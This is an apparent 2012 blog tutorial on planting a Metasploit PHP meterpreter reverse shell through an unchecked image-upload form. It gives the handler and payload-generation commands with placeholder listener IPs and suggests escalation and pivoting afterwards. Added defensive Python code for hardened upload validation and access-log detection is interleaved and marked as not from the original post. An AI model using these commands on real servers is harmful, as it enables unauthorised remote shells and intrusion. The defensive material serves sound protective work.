Tuesday, April 3, 2012

Deploying payload via PHP

Another fun way to deploy our meterpreter payload is with PHP.

Many web servers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the file type, this allows us to upload a PHP file containing our payload and then get the server to execute it. Alternatively, the payload could be injected into a forum post or something similar.
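The weakness described above is an upload handler that trusts the client-supplied file name. The following Python example is added here and is not code from the original post; it shows the weak behaviour beside a hardened validator (extension allow-list, magic-byte check, scan for embedded PHP tags, and a server-generated random name) run over constructed sample uploads. The sample file names, byte strings and the `/images/` assumption are invented for the demonstration.

```python
import os
import re
import secrets

# Constructed sample uploads standing in for multipart form-data bodies.
# Real JPEGs start with FF D8 FF, PNGs with 89 'PNG' CR LF 1A LF, GIFs with "GIF8".
SAMPLE_UPLOADS = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    # The page's m.php: a PHP file sent through the image upload form.
    "m.php": b"<?php /* stager would be here */ ?>",
    # Valid JPEG header with a PHP tag appended. This passes an extension-only
    # check, and servers that map any ".php" path segment to the PHP handler
    # would still execute it.
    "shell.php.jpg": b"\xff\xd8\xff\xe0" + b"<?php echo 'hi'; ?>",
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
}

# Allowed extensions and the magic bytes each one must start with.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Matches "<?php" and the short echo tag "<?=", which is enough to catch a PHP
# payload stored verbatim or appended to an otherwise valid image.
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


class RejectedUpload(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_name(filename):
    # The weak handler the page relies on: the client-chosen name is kept
    # (only the directory part is stripped), so "m.php" lands in the image
    # directory and the web server runs it on the next GET.
    return os.path.basename(filename)


def hardened_name(filename, data):
    # 1. Allow-list the extension; anything not on the list is rejected.
    if "." not in filename:
        raise RejectedUpload("no extension")
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise RejectedUpload(f"extension .{ext} not allowed")
    # 2. Check the content really is that image type (magic bytes).
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise RejectedUpload("content does not match declared type")
    # 3. Refuse files that carry PHP tags anywhere in the body (polyglots).
    if PHP_TAG.search(data):
        raise RejectedUpload("embedded PHP tag")
    # 4. Discard the client's name entirely: a random name with the validated
    #    extension leaves no double extension or path trick to work with.
    return f"{secrets.token_hex(16)}.{ext}"


def triage(uploads):
    """Return {filename: outcome} for each upload under both handlers."""
    results = {}
    for name, data in uploads.items():
        try:
            hardened = hardened_name(name, data)
        except RejectedUpload as exc:
            hardened = f"rejected: {exc}"
        results[name] = {"vulnerable": vulnerable_name(name), "hardened": hardened}
    return results


if __name__ == "__main__":
    for name, outcome in triage(SAMPLE_UPLOADS).items():
        print(f"{name:15} vulnerable -> {outcome['vulnerable']:15} "
              f"hardened -> {outcome['hardened']}")
```

The content checks are a second layer, not a replacement for the server-side configuration: uploads should also live outside the document root, or in a directory where the web server has script execution disabled, so that a file which slips past validation is served as static bytes rather than run.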

The first thing we do is start up a meterpreter handler for the PHP payload, like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J

Now we create our meterpreter PHP payload file. This command generates the PHP payload in raw form and saves it as m.php:
/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php

Now we simply upload our PHP script like we would an image file.

Then we navigate a browser to the location where the server usually hosts images and click on the file we just uploaded.

The server runs our m.php, which makes the server connect back to our meterpreter handler on the specified port and gives us a shell on the target. In this case the process is running as the apache user.
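From the defender's side, the sequence just described leaves a clear trace in the web server's access log: a POST to the upload form followed by a GET for a script file inside the image directory, from the same client. The following Python example is added here and is not code from the original post; it parses constructed Apache combined-format log lines and flags any request for a PHP-style file under an upload directory, upgrading the alert when the same client uploaded something shortly before. The paths `/upload.php` and `/images/`, the IP addresses and the timestamps are assumptions made up for the demonstration.

```python
import re
from datetime import datetime

# Constructed Apache combined-format lines: an upload to the image form, then a
# request for a .php file inside the image directory from the same client, plus
# ordinary image traffic from another client.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Apr/2012:14:02:11 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Apr/2012:14:02:30 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Apr/2012:14:02:40 +0000] "GET /images/m.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Apr/2012:14:05:00 +0000] "GET /images/photo.jpg HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to get client, time, method, path and status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/images/",)          # where the app writes user uploads (assumed)
UPLOAD_ENDPOINTS = ("/upload.php",)  # the upload form handler (assumed)
# Script extensions anywhere in the name, so "shell.php.jpg" is caught too.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
WINDOW_SECONDS = 600                 # how long after an upload a GET still correlates


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_alerts(log_text):
    """Flag script requests under upload directories and correlate each one
    with a recent upload from the same client."""
    alerts = []
    last_upload = {}  # ip -> timestamp of the most recent POST to an upload endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path in UPLOAD_ENDPOINTS:
            last_upload[rec["ip"]] = rec["ts"]
            continue
        if any(path.startswith(d) for d in UPLOAD_DIRS) and SCRIPT_EXT.search(path):
            alert = {"ip": rec["ip"], "path": path, "status": rec["status"],
                     "rule": "script_in_upload_dir"}
            prior = last_upload.get(rec["ip"])
            if prior is not None and (rec["ts"] - prior).total_seconds() <= WINDOW_SECONDS:
                alert["rule"] = "upload_then_execute"
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(f"[{alert['rule']}] {alert['ip']} requested {alert['path']} "
              f"(status {alert['status']})")
```

A 200 for a script file under an upload path is worth an alert even without the preceding POST, since the directory should only ever serve static images. The other signal this technique leaves is on the host itself: the payload makes the web server process, running as the apache user, open an outbound TCP connection to the handler's port, which is not something a web server user normally does.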

We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what we've actually gained access to. Chances are there are database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.

47 comments:

  1. hi, how can I upload my PHP file please
